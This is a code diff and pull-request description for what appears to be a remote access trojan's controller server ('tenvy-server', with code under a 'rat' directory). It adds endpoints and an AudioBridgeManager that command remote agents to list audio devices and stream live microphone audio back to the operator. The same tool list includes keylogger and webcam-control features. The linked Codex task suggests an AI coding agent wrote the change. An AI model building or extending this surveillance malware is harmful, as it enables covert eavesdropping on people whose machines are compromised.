-                                                                                                <p class="text-xs text-muted-foreground">
-                                                                                                        Toggle to suspend this capture source without removing it from the pipeline.
-                                                                                                </p>
-                                                                                        </div>
-                                                                                        <Switch
-                                                                                                checked={control.muted}
-                                                                                                onclick={() => toggleMute(device, !control.muted)}
-                                                                                                aria-label={`Toggle mute for ${device.label}`}
-                                                                                        />
-                                                                                </div>
-                                                                        </div>
-                                                                        <div class="flex flex-wrap gap-2">
-                                                                                <Button
-                                                                                        type="button"
-                                                                                        variant="outline"
-                                                                                        size="sm"
-                                                                                        onclick={() => setDefaultDevice(device)}
-                                                                                        disabled={selectedInputId === device.id}
-                                                                                >
-                                                                                        {selectedInputId === device.id ? 'Active input' : 'Use as default input'}
-                                                                                </Button>
-                                                                                <Button
-                                                                                        type="button"
-                                                                                        variant="ghost"
-                                                                                        size="sm"
-                                                                                        onclick={() => openDeviceDetails(device)}
-                                                                                >
-                                                                                        View details
-                                                                                </Button>
-                                                                        </div>
-                                                                </li>
-                                                        {/each}
-                                                </ul>
-                                        {/if}
-                                </section>
-                                <section class="space-y-4">
-                                        <div>
-                                                <h3 class="text-sm font-semibold text-foreground">Output devices</h3>
-                                                <p class="text-xs text-muted-foreground">
-                                                        Route playback, adjust mix balance, and choose the default speaker for operator diagnostics.
-                                                </p>
-                                        </div>
-                                        {#if outputs.length === 0}
-                                                <p class="rounded-lg border border-border/60 bg-muted/40 p-4 text-sm text-muted-foreground">
-                                                        No audio outputs detected. Attach a playback device or request permission to view existing
-                                                        routes.
-                                                </p>
-                                        {:else}
-                                                <ul class="space-y-4">
-                                                        {#each outputs as device (device.id)}
-                                                                {@const control = deviceControls[device.id] ?? createDefaultControl('output')}
-                                                                <li class="space-y-4 rounded-lg border border-border/60 bg-muted/30 p-4">
-                                                                        <div class="flex flex-col gap-2 md:flex-row md:items-start md:justify-between">
-                                                                                <div class="space-y-1">
-                                                                                        <p class="font-medium text-foreground">{device.label}</p>
-                                                                                        <p class="text-xs text-muted-foreground">
-                                                                                                Status: {deviceStatus(device)} · Last seen {formatTimestamp(device.lastSeen)}
-                                                                                        </p>
-                                                                                        {#if device.groupId}
-                                                                                                <p class="text-xs text-muted-foreground">Group: {device.groupId}</p>
-                                                                                        {/if}
-                                                                                </div>
-                                                                                <div class="flex flex-wrap justify-end gap-2">
-                                                                                        {#if device.systemDefault}
-                                                                                                <Badge variant="outline">System default</Badge>
-                                                                                        {/if}
-                                                                                        {#if device.communicationsDefault}
-                                                                                                <Badge variant="outline">Communications</Badge>
-                                                                                        {/if}
-                                                                                        {#if selectedOutputId === device.id}
-                                                                                                <Badge variant="secondary">Workspace default</Badge>
-                                                                                        {/if}
-                                                                                </div>
-                                                                        </div>
-                                                                        <div class="space-y-3">
-                                                                                <div class="space-y-1">
-                                                                                        <div class="flex items-center justify-between text-xs uppercase tracking-wide text-muted-foreground">
-                                                                                                <span>Volume</span>
-                                                                                                <span>{control.muted ? 'Muted' : `${control.volume}%`}</span>
-                                                                                        </div>
-                                                                                        <input
-                                                                                                type="range"
-                                                                                                min="0"
-                                                                                                max="100"
-                                                                                                step="1"
-                                                                                                value={control.volume}
-                                                                                                oninput={(event) =>
-                                                                                                        updateVolume(
-                                                                                                                device,
-                                                                                                                Number(
-                                                                                                                        (event.currentTarget as HTMLInputElement).value
-                                                                                                                ),
-                                                                                                                false
-                                                                                                        )
-                                                                                                }
-                                                                                                onchange={(event) =>
-                                                                                                        updateVolume(
-                                                                                                                device,
-                                                                                                                Number(
-                                                                                                                        (event.currentTarget as HTMLInputElement).value
-                                                                                                                ),
-                                                                                                                true
-                                                                                                        )
-                                                                                                }
-                                                                                                class="h-1.5 w-full cursor-pointer appearance-none rounded-full bg-muted accent-primary"
-                                                                                                aria-label={`Adjust volume for ${device.label}`}
-                                                                                        />
-                                                                                </div>
-                                                                                <div class="space-y-1">
-                                                                                        <div class="flex items-center justify-between text-xs uppercase tracking-wide text-muted-foreground">
-                                                                                                <span>Balance</span>
-                                                                                                <span>{formatBalance(control.balance)}</span>
-                                                                                        </div>
-                                                                                        <input
-                                                                                                type="range"
-                                                                                                min="-100"
-                                                                                                max="100"
-                                                                                                step="1"
-                                                                                                value={Math.round(control.balance * 100)}
-                                                                                                oninput={(event) =>
-                                                                                                        updateBalance(
-                                                                                                                device,
-                                                                                                                Number(
-                                                                                                                        (event.currentTarget as HTMLInputElement).value
-                                                                                                                ),
-                                                                                                                false
-                                                                                                        )
-                                                                                                }
-                                                                                                onchange={(event) =>
-                                                                                                        updateBalance(
-                                                                                                                device,
-                                                                                                                Number(
-                                                                                                                        (event.currentTarget as HTMLInputElement).value
-                                                                                                                ),
-                                                                                                                true
-                                                                                                        )
-                                                                                                }
-                                                                                                class="h-1.5 w-full cursor-pointer appearance-none rounded-full bg-muted accent-primary"
-                                                                                                aria-label={`Adjust balance for ${device.label}`}
-                                                                                        />
-                                                                                </div>
-                                                                                <div class="flex items-center justify-between gap-3 rounded-lg border border-border/60 bg-background/60 p-3">
-                                                                                        <div>
-                                                                                                <p class="text-xs font-medium uppercase tracking-wide text-muted-foreground">Mute</p>
-                                                                                                <p class="text-xs text-muted-foreground">
-                                                                                                        Temporarily silence playback while keeping the channel configured.
-                                                                                                </p>
-                                                                                        </div>
-                                                                                        <Switch
-                                                                                                checked={control.muted}
-                                                                                                onclick={() => toggleMute(device, !control.muted)}
-                                                                                                aria-label={`Toggle mute for ${device.label}`}
-                                                                                        />
-                                                                                </div>
-                                                                        </div>
-                                                                        <div class="flex flex-wrap gap-2">
-                                                                                <Button
-                                                                                        type="button"
-                                                                                        variant="outline"
-                                                                                        size="sm"
-                                                                                        onclick={() => setDefaultDevice(device)}
-                                                                                        disabled={selectedOutputId === device.id}
-                                                                                >
-                                                                                        {selectedOutputId === device.id ? 'Active output' : 'Use as default output'}
-                                                                                </Button>
-                                                                                <Button
-                                                                                        type="button"
-                                                                                        variant="ghost"
-                                                                                        size="sm"
-                                                                                        onclick={() => openDeviceDetails(device)}
-                                                                                >
-                                                                                        View details
-                                                                                </Button>
-                                                                        </div>
-                                                                </li>
-                                                        {/each}
-                                                </ul>
-                                        {/if}
-                                </section>
-                        </div>
-                </CardContent>
-        </Card>
-
-        <Card>
-                <CardHeader>
-                        <CardTitle class="text-base">Playback diagnostics</CardTitle>
-                        <CardDescription>
-                                Generate reference tones to verify speaker routing and balance adjustments without leaving the
-                                workspace.
-                        </CardDescription>
-                </CardHeader>
-                <CardContent class="space-y-4">
-                        <div class="flex flex-wrap gap-2">
-                                <Button type="button" onclick={playTestSound} disabled={playbackState === 'playing'}>
-                                        Play
-                                </Button>
-                                <Button
-                                        type="button"
-                                        variant="outline"
-                                        onclick={pauseTestSound}
-                                        disabled={playbackState !== 'playing'}
-                                >
-                                        Pause
-                                </Button>
-                                <Button
-                                        type="button"
-                                        variant="outline"
-                                        onclick={stopTestSound}
-                                        disabled={playbackState === 'idle'}
-                                >
-                                        Stop
-                                </Button>
-                        </div>
-                        <div class="space-y-1">
-                                <div class="flex items-center justify-between text-xs uppercase tracking-wide text-muted-foreground">
-                                        <span>Progress</span>
-                                        <span>{playbackState === 'playing' || playbackState === 'paused' ? `${playbackPosition.toFixed(1)}s` : '0.0s'} / {playbackDuration.toFixed(1)}s</span>
-                                </div>
-                                <div class="h-2 rounded-full bg-muted">
-                                        <div
-                                                class="h-full rounded-full bg-primary"
-                                                style={`width: ${Math.round(playbackProgressPercent())}%`}
-                                        ></div>
-                                </div>
-                        </div>
-                        <p class="text-xs text-muted-foreground">
-                                Audio routes through {selectedOutputLabel()}. Use the controls above to confirm volume and
-                                balance changes before going live.
-                        </p>
-                        {#if playbackError}
-                                <p class="text-sm text-destructive">{playbackError}</p>
-                        {/if}
-                </CardContent>
-        </Card>
-
-        <Card class="border-dashed">
-                <CardHeader>
-                        <CardTitle class="text-base">Streaming checklist</CardTitle>
-                        <CardDescription>Items to confirm before moving an audio bridge into production.</CardDescription>
-                </CardHeader>
-                <CardContent class="space-y-2 text-sm text-muted-foreground">
-                        <ul class="list-disc space-y-1 pl-5">
-                                <li>Verify default input and output selections align with the operator's scenario.</li>
-                                <li>Calibrate capture gain and playback volume to avoid clipping or low signal.</li>
-                                <li>Exercise the test tone to confirm balance, routing, and mute automation.</li>
-                        </ul>
-                </CardContent>
-        </Card>
-
-        <ActionLog entries={log} />
-</div>
-
-<Dialog.Root bind:open={detailDialogOpen}>
-        <Dialog.Content class="sm:max-w-lg">
-                {#if detailDevice}
-                        <Dialog.Header>
-                                <Dialog.Title>{detailDevice.label}</Dialog.Title>
-                                <Dialog.Description>
-                                        {detailDevice.kind === 'input' ? 'Audio input device' : 'Audio output device'}
-                                </Dialog.Description>
-                        </Dialog.Header>
-                        <div class="space-y-4 text-sm">
-                                <div class="grid gap-1">
-                                        <p>
-                                                <span class="font-medium text-foreground">Status:</span> {deviceStatus(detailDevice)}
-                                        </p>
-                                        <p>
-                                                <span class="font-medium text-foreground">Device ID:</span>
-                                                <code class="break-all">{detailDevice.deviceId || 'Unavailable'}</code>
-                                        </p>
-                                        <p>
-                                                <span class="font-medium text-foreground">Group ID:</span>
-                                                {detailDevice.groupId || 'Unknown'}
-                                        </p>
-                                        <p>
-                                                <span class="font-medium text-foreground">Last seen:</span>
-                                                {formatTimestamp(detailDevice.lastSeen)}
-                                        </p>
-                                        <p>
-                                                <span class="font-medium text-foreground">Muted:</span>
-                                                {deviceControls[detailDevice.id]?.muted ? 'Yes' : 'No'}
-                                        </p>
-                                        <p>
-                                                <span class="font-medium text-foreground">Volume:</span>
-                                                {deviceControls[detailDevice.id]?.muted
-                                                        ? 'Muted'
-                                                        : `${deviceControls[detailDevice.id]?.volume ?? 0}%`}
-                                        </p>
-                                        {#if detailDevice.kind === 'output'}
-                                                <p>
-                                                        <span class="font-medium text-foreground">Balance:</span>
-                                                        {formatBalance(deviceControls[detailDevice.id]?.balance ?? 0)}
-                                                </p>
-                                        {/if}
-                                </div>
-                                {#if detailLoading}
-                                        <p class="text-xs text-muted-foreground">Gathering diagnostics…</p>
-                                {:else if detailError}
-                                        <p class="text-sm text-destructive">{detailError}</p>
-                                {:else if deviceDiagnostics[detailDevice.id]}
-                                        {@const diagnostics = deviceDiagnostics[detailDevice.id]}
-                                        <div class="space-y-1">
-                                                <p class="text-xs font-semibold uppercase tracking-wide text-muted-foreground">
-                                                        Diagnostics
-                                                </p>
-                                                <ul class="space-y-1 text-sm text-foreground">
-                                                        {#if diagnostics.sampleRate !== null}
-                                                                <li>Sample rate: {diagnostics.sampleRate} Hz</li>
-                                                        {/if}
-                                                        {#if diagnostics.channelCount !== null}
-                                                                <li>Channels: {diagnostics.channelCount}</li>
-                                                        {/if}
-                                                        {#if diagnostics.latency !== null}
-                                                                <li>Reported latency: {diagnostics.latency.toFixed(3)} s</li>
-                                                        {/if}
-                                                        {#if diagnostics.echoCancellation !== null}
-                                                                <li>Echo cancellation: {diagnostics.echoCancellation ? 'Enabled' : 'Disabled'}</li>
-                                                        {/if}
-                                                        {#if diagnostics.noiseSuppression !== null}
-                                                                <li>Noise suppression: {diagnostics.noiseSuppression ? 'Enabled' : 'Disabled'}</li>
-                                                        {/if}
-                                                        {#if diagnostics.autoGainControl !== null}
-                                                                <li>Auto gain control: {diagnostics.autoGainControl ? 'Enabled' : 'Disabled'}</li>
-                                                        {/if}
-                                                </ul>
                                         </div>
                                 {:else}
-                                        <p class="text-xs text-muted-foreground">
-                                                No additional diagnostics are available for this device.
-                                        </p>
+                                        <p class="text-sm text-muted-foreground">No active audio session.</p>
                                 {/if}
-                        </div>
-                        <Dialog.Footer>
-                                <Dialog.Close>
-                                        {#snippet child({ props })}
-                                                <Button {...props} type="button" variant="outline">Close</Button>
-                                        {/snippet}
-                                </Dialog.Close>
-                        </Dialog.Footer>
-                {/if}
-        </Dialog.Content>
-</Dialog.Root>
+                        </CardContent>
+                        <CardFooter class="flex flex-col gap-2 sm:flex-row sm:justify-between">
+                                <Button variant="outline" on:click={() => stopListening(false)} disabled={!session?.active && !listening}>
+                                        Stop session
+                                </Button>
+                                {#if session}
+                                        <Button variant="ghost" disabled>{session.direction === 'input' ? 'Input monitoring' : 'Output monitoring'}</Button>
+                                {/if}
+                        </CardFooter>
+                </Card>
+        </div>
+
+        <Card>
+                <CardHeader>
+                        <CardTitle>Recent actions</CardTitle>
+                        <CardDescription>Track audio bridge activity for this client.</CardDescription>
+                </CardHeader>
+                <CardContent>
+                                <ActionLog entries={log} />
+                </CardContent>
+        </Card>
+</div>

--- a/tenvy-server/src/lib/data/client-tools.ts
+++ b/tenvy-server/src/lib/data/client-tools.ts
@@ -37,13 +37,13 @@ const definitions = {
 		segments: ['control', 'webcam-control'],
 		target: '_blank'
 	},
-	'audio-control': {
-		id: 'audio-control',
-		title: 'Audio Control',
-		description: 'Stage audio capture, playback, and streaming features.',
-		segments: ['control', 'audio-control'],
-		target: '_blank'
-	},
+        'audio-control': {
+                id: 'audio-control',
+                title: 'Audio Control',
+                description: 'Enumerate agent audio hardware and bridge live microphone streams to the controller.',
+                segments: ['control', 'audio-control'],
+                target: '_blank'
+        },
 	'keylogger-online': {
 		id: 'keylogger-online',
 		title: 'Keylogger · Online',

--- a/tenvy-server/src/lib/server/rat/audio.ts
+++ b/tenvy-server/src/lib/server/rat/audio.ts
@@ -1,0 +1,262 @@
+import { randomUUID } from 'crypto';
+import type {
+        AudioDeviceInventory,
+        AudioDeviceInventoryState,
+        AudioDirection,
+        AudioSessionState,
+        AudioStreamChunk,
+        AudioStreamFormat
+} from '$lib/types/audio';
+
+const encoder = new TextEncoder();
+
+export class AudioBridgeError extends Error {
+        status: number;
+
+        constructor(message: string, status = 400) {
+                super(message);
+                this.name = 'AudioBridgeError';
+                this.status = status;
+        }
+}
+
+interface AudioSubscriber {
+        controller: ReadableStreamDefaultController<Uint8Array>;
+        closed: boolean;
+}
+
+interface AudioSessionRecord {
+        id: string;
+        agentId: string;
+        direction: AudioDirection;
+        deviceId?: string;
+        deviceLabel?: string;
+        format: AudioStreamFormat;
+        startedAt: Date;
+        lastUpdatedAt?: Date;
+        lastSequence?: number;
+        active: boolean;
+        subscribers: Set<AudioSubscriber>;
+}
+
+function cloneInventory(input: AudioDeviceInventory): AudioDeviceInventory {
+        return {
+                inputs: input.inputs.map((item) => ({ ...item })),
+                outputs: input.outputs.map((item) => ({ ...item })),
+                capturedAt: input.capturedAt,
+                requestId: input.requestId
+        } satisfies AudioDeviceInventory;
+}
+
+function encodeEvent(event: string, payload: unknown): Uint8Array {
+        return encoder.encode(`event: ${event}\ndata: ${JSON.stringify(payload)}\n\n`);
+}
+
+function toSessionState(record: AudioSessionRecord): AudioSessionState {
+        return {
+                sessionId: record.id,
+                agentId: record.agentId,
+                deviceId: record.deviceId,
+                deviceLabel: record.deviceLabel,
+                direction: record.direction,
+                format: { ...record.format },
+                startedAt: record.startedAt.toISOString(),
+                lastUpdatedAt: record.lastUpdatedAt?.toISOString(),
+                lastSequence: record.lastSequence,
+                active: record.active
+        } satisfies AudioSessionState;
+}
+
+export class AudioBridgeManager {
+        private inventories = new Map<string, AudioDeviceInventory>();
+        private pendingInventory = new Map<string, Set<string>>();
+        private sessions = new Map<string, AudioSessionRecord>();
+
+        markInventoryRequest(agentId: string, requestId: string) {
+                const trimmed = requestId?.trim();
+                if (!trimmed) {
+                        return;
+                }
+                if (!this.pendingInventory.has(agentId)) {
+                        this.pendingInventory.set(agentId, new Set());
+                }
+                this.pendingInventory.get(agentId)?.add(trimmed);
+        }
+
+        updateInventory(agentId: string, inventory: AudioDeviceInventory) {
+                if (!inventory) {
+                        throw new AudioBridgeError('Invalid audio inventory payload', 400);
+                }
+                this.inventories.set(agentId, cloneInventory(inventory));
+                if (inventory.requestId) {
+                        const pending = this.pendingInventory.get(agentId);
+                        pending?.delete(inventory.requestId);
+                        if (pending && pending.size === 0) {
+                                this.pendingInventory.delete(agentId);
+                        }
+                }
+        }
+
+        getInventoryState(agentId: string): AudioDeviceInventoryState {
+                const inventory = this.inventories.get(agentId);
+                const pending = this.pendingInventory.get(agentId);
+                return {
+                        inventory: inventory ? cloneInventory(inventory) : null,
+                        pending: Boolean(pending && pending.size > 0)
+                } satisfies AudioDeviceInventoryState;
+        }
+
+        createSession(
+                agentId: string,
+                options: {
+                        direction: AudioDirection;
+                        deviceId?: string;
+                        deviceLabel?: string;
+                        format: AudioStreamFormat;
+                        sessionId?: string;
+                }
+        ): AudioSessionState {
+                if (!options) {
+                        throw new AudioBridgeError('Missing audio session configuration', 400);
+                }
+
+                const direction = options.direction ?? 'input';
+                if (direction !== 'input' && direction !== 'output') {
+                        throw new AudioBridgeError('Unsupported audio direction', 400);
+                }
+
+                const existing = this.sessions.get(agentId);
+                if (existing && existing.active) {
+                        throw new AudioBridgeError('An audio session is already active', 409);
+                }
+
+                const record: AudioSessionRecord = {
+                        id: options.sessionId?.trim() || randomUUID(),
+                        agentId,
+                        direction,
+                        deviceId: options.deviceId?.trim() || undefined,
+                        deviceLabel: options.deviceLabel?.trim() || undefined,
+                        format: { ...options.format },
+                        startedAt: new Date(),
+                        lastUpdatedAt: new Date(),
+                        active: true,
+                        subscribers: new Set()
+                };
+
+                this.sessions.set(agentId, record);
+                return toSessionState(record);
+        }
+
+        getSessionState(agentId: string): AudioSessionState | null {
+                const record = this.sessions.get(agentId);
+                if (!record) {
+                        return null;
+                }
+                return toSessionState(record);
+        }
+
+        closeSession(agentId: string, sessionId: string): AudioSessionState | null {
+                const record = this.sessions.get(agentId);
+                if (!record || record.id !== sessionId) {
+                        return this.getSessionState(agentId);
+                }
+
+                if (record.active) {
+                        record.active = false;
+                        record.lastUpdatedAt = new Date();
+                        this.broadcast(record, 'stopped', { sessionId: record.id });
+                        this.closeSubscribers(record);
+                }
+
+                return toSessionState(record);
+        }
+
+        ingestChunk(agentId: string, chunk: AudioStreamChunk) {
+                if (!chunk || typeof chunk.sessionId !== 'string' || chunk.sessionId.trim() === '') {
+                        throw new AudioBridgeError('Audio chunk session identifier is required', 400);
+                }
+
+                const record = this.sessions.get(agentId);
+                if (!record || record.id !== chunk.sessionId) {
+                        throw new AudioBridgeError('No active audio session for this agent', 404);
+                }
+
+                if (!record.active) {
+                        throw new AudioBridgeError('Audio session is not active', 409);
+                }
+
+                record.lastSequence = chunk.sequence;
+                record.lastUpdatedAt = new Date();
+                this.broadcast(record, 'chunk', {
+                        sessionId: record.id,
+                        sequence: chunk.sequence,
+                        timestamp: chunk.timestamp,
+                        format: { ...chunk.format },
+                        data: chunk.data
+                });
+        }
+
+        subscribe(agentId: string, sessionId: string): ReadableStream<Uint8Array> {
+                const record = this.sessions.get(agentId);
+                if (!record || record.id !== sessionId) {
+                        throw new AudioBridgeError('Audio session not found', 404);
+                }
+                if (!record.active) {
+                        throw new AudioBridgeError('Audio session is not active', 409);
+                }
+
+                let subscriber: AudioSubscriber;
+
+                return new ReadableStream<Uint8Array>({
+                        start: (controller) => {
+                                subscriber = { controller, closed: false } satisfies AudioSubscriber;
+                                record.subscribers.add(subscriber);
+                                controller.enqueue(encodeEvent('session', toSessionState(record)));
+                        },
+                        cancel: () => {
+                                if (subscriber && !subscriber.closed) {
+                                        subscriber.closed = true;
+                                        record.subscribers.delete(subscriber);
+                                }
+                        }
+                });
+        }
+
+        private broadcast(record: AudioSessionRecord, event: string, payload: unknown) {
+                if (record.subscribers.size === 0) {
+                        return;
+                }
+                const data = encodeEvent(event, payload);
+                for (const subscriber of record.subscribers) {
+                        try {
+                                subscriber.controller.enqueue(data);
+                        } catch (err) {
+                                subscriber.closed = true;
+                        }
+                }
+
+                for (const subscriber of [...record.subscribers]) {
+                        if (subscriber.closed) {
+                                try {
+                                        subscriber.controller.close();
+                                } catch {
+                                        // ignore
+                                }
+                                record.subscribers.delete(subscriber);
+                        }
+                }
+        }
+
+        private closeSubscribers(record: AudioSessionRecord) {
+                for (const subscriber of record.subscribers) {
+                        try {
+                                subscriber.controller.close();
+                        } catch {
+                                // ignore
+                        }
+                }
+                record.subscribers.clear();
+        }
+}
+
+export const audioBridgeManager = new AudioBridgeManager();

--- a/tenvy-server/src/lib/types/audio.ts
+++ b/tenvy-server/src/lib/types/audio.ts
@@ -1,0 +1,1 @@
+export * from '../../../../shared/types/audio';

--- a/tenvy-server/src/routes/api/agents/[id]/audio/chunks/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/audio/chunks/+server.ts
@@ -1,0 +1,29 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { audioBridgeManager, AudioBridgeError } from '$lib/server/rat/audio';
+import type { AudioStreamChunk } from '$lib/types/audio';
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let payload: AudioStreamChunk;
+        try {
+                payload = (await request.json()) as AudioStreamChunk;
+        } catch {
+                throw error(400, 'Invalid audio chunk payload');
+        }
+
+        try {
+                audioBridgeManager.ingestChunk(id, payload);
+        } catch (err) {
+                if (err instanceof AudioBridgeError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to record audio chunk');
+        }
+
+        return json({ accepted: true });
+};

--- a/tenvy-server/src/routes/api/agents/[id]/audio/devices/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/audio/devices/+server.ts
@@ -1,0 +1,39 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { audioBridgeManager, AudioBridgeError } from '$lib/server/rat/audio';
+import type { AudioDeviceInventory } from '$lib/types/audio';
+
+export const GET: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const state = audioBridgeManager.getInventoryState(id);
+        return json(state);
+};
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let payload: AudioDeviceInventory;
+        try {
+                payload = (await request.json()) as AudioDeviceInventory;
+        } catch (err) {
+                throw error(400, 'Invalid audio inventory payload');
+        }
+
+        try {
+                audioBridgeManager.updateInventory(id, payload);
+        } catch (err) {
+                if (err instanceof AudioBridgeError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to update audio inventory');
+        }
+
+        return json({ accepted: true });
+};

--- a/tenvy-server/src/routes/api/agents/[id]/audio/devices/refresh/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/audio/devices/refresh/+server.ts
@@ -1,0 +1,32 @@
+import { randomUUID } from 'crypto';
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { registry, RegistryError } from '$lib/server/rat/store';
+import { audioBridgeManager } from '$lib/server/rat/audio';
+import type { AudioControlCommandPayload } from '$lib/types/audio';
+
+export const POST: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const requestId = randomUUID();
+        audioBridgeManager.markInventoryRequest(id, requestId);
+
+        const payload: AudioControlCommandPayload = {
+                action: 'enumerate',
+                requestId
+        };
+
+        try {
+                registry.queueCommand(id, { name: 'audio-control', payload });
+        } catch (err) {
+                if (err instanceof RegistryError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to queue audio inventory command');
+        }
+
+        return json({ requestId });
+};

--- a/tenvy-server/src/routes/api/agents/[id]/audio/session/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/audio/session/+server.ts
@@ -1,0 +1,142 @@
+import { json, error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { audioBridgeManager, AudioBridgeError } from '$lib/server/rat/audio';
+import { registry, RegistryError } from '$lib/server/rat/store';
+import type { AudioControlCommandPayload, AudioSessionRequest } from '$lib/types/audio';
+
+function normalizeRequest(body: Record<string, unknown>): AudioSessionRequest {
+        const request: AudioSessionRequest = {};
+        if (typeof body.deviceId === 'string') {
+                request.deviceId = body.deviceId;
+        }
+        if (typeof body.deviceLabel === 'string') {
+                request.deviceLabel = body.deviceLabel;
+        }
+        if (body.direction === 'output') {
+                request.direction = 'output';
+        } else if (body.direction === 'input') {
+                request.direction = 'input';
+        }
+        if (typeof body.sampleRate === 'number') {
+                request.sampleRate = Math.max(1, Math.floor(body.sampleRate));
+        }
+        if (typeof body.channels === 'number') {
+                request.channels = Math.max(1, Math.floor(body.channels));
+        }
+        if (typeof body.encoding === 'string') {
+                request.encoding = body.encoding as AudioSessionRequest['encoding'];
+        }
+        return request;
+}
+
+export const GET: RequestHandler = ({ params }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const session = audioBridgeManager.getSessionState(id);
+        return json({ session });
+};
+
+export const POST: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let body: Record<string, unknown> = {};
+        try {
+                body = (await request.json()) as Record<string, unknown>;
+        } catch {
+                body = {};
+        }
+
+        const payload = normalizeRequest(body);
+        const direction = payload.direction ?? 'input';
+        const sampleRate = payload.sampleRate && payload.sampleRate > 0 ? payload.sampleRate : 48_000;
+        const channelsRaw = payload.channels && payload.channels > 0 ? payload.channels : 1;
+        const channels = Math.max(1, Math.min(2, channelsRaw));
+        const encoding = payload.encoding ?? 'pcm16';
+        if (encoding !== 'pcm16') {
+                throw error(400, 'Only PCM16 audio encoding is supported');
+        }
+
+        let session;
+        try {
+                session = audioBridgeManager.createSession(id, {
+                        direction,
+                        deviceId: payload.deviceId,
+                        deviceLabel: payload.deviceLabel,
+                        format: { encoding, sampleRate, channels }
+                });
+        } catch (err) {
+                if (err instanceof AudioBridgeError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to create audio session');
+        }
+
+        const command: AudioControlCommandPayload = {
+                action: 'start',
+                sessionId: session.sessionId,
+                deviceId: session.deviceId,
+                deviceLabel: session.deviceLabel,
+                direction: session.direction,
+                sampleRate,
+                channels,
+                encoding
+        };
+
+        try {
+                registry.queueCommand(id, { name: 'audio-control', payload: command });
+        } catch (err) {
+                audioBridgeManager.closeSession(id, session.sessionId);
+                if (err instanceof RegistryError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to queue audio session command');
+        }
+
+        return json({ session }, { status: 201 });
+};
+
+export const DELETE: RequestHandler = async ({ params, request }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        let body: Record<string, unknown> = {};
+        try {
+                body = (await request.json()) as Record<string, unknown>;
+        } catch {
+                body = {};
+        }
+
+        const session = audioBridgeManager.getSessionState(id);
+        if (!session || !session.active) {
+                return json({ session });
+        }
+
+        if (typeof body.sessionId === 'string' && body.sessionId !== session.sessionId) {
+                throw error(409, 'Session identifier mismatch');
+        }
+
+        const command: AudioControlCommandPayload = {
+                action: 'stop',
+                sessionId: session.sessionId
+        };
+
+        try {
+                registry.queueCommand(id, { name: 'audio-control', payload: command });
+        } catch (err) {
+                if (err instanceof RegistryError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to queue audio stop command');
+        }
+
+        const next = audioBridgeManager.closeSession(id, session.sessionId);
+        return json({ session: next });
+};

--- a/tenvy-server/src/routes/api/agents/[id]/audio/stream/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/audio/stream/+server.ts
@@ -1,0 +1,33 @@
+import { error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { audioBridgeManager, AudioBridgeError } from '$lib/server/rat/audio';
+
+export const GET: RequestHandler = ({ params, url, setHeaders }) => {
+        const id = params.id;
+        if (!id) {
+                throw error(400, 'Missing agent identifier');
+        }
+
+        const sessionId = url.searchParams.get('sessionId');
+        if (!sessionId) {
+                throw error(400, 'Missing session identifier');
+        }
+
+        let stream: ReadableStream<Uint8Array>;
+        try {
+                stream = audioBridgeManager.subscribe(id, sessionId);
+        } catch (err) {
+                if (err instanceof AudioBridgeError) {
+                        throw error(err.status, err.message);
+                }
+                throw error(500, 'Failed to subscribe to audio stream');
+        }
+
+        setHeaders({
+                'Content-Type': 'text/event-stream',
+                'Cache-Control': 'no-cache, no-transform',
+                Connection: 'keep-alive'
+        });
+
+        return new Response(stream);
+};


### PR DESCRIPTION
## Summary
- add a Go-based audio bridge to enumerate agent input/output devices and stream PCM chunks to the controller
- expose server-side audio inventory/session endpoints plus SSE streaming and shared type definitions
- redesign the audio control workspace UI to drive remote capture, playback, and logging

## Testing
- `go test ./...`
- `bun run lint` *(fails: Prettier reports existing formatting issues across the repository)*

------
https://chatgpt.com/codex/tasks/task_e_68e642717b88832b852b6f4b9ec6b908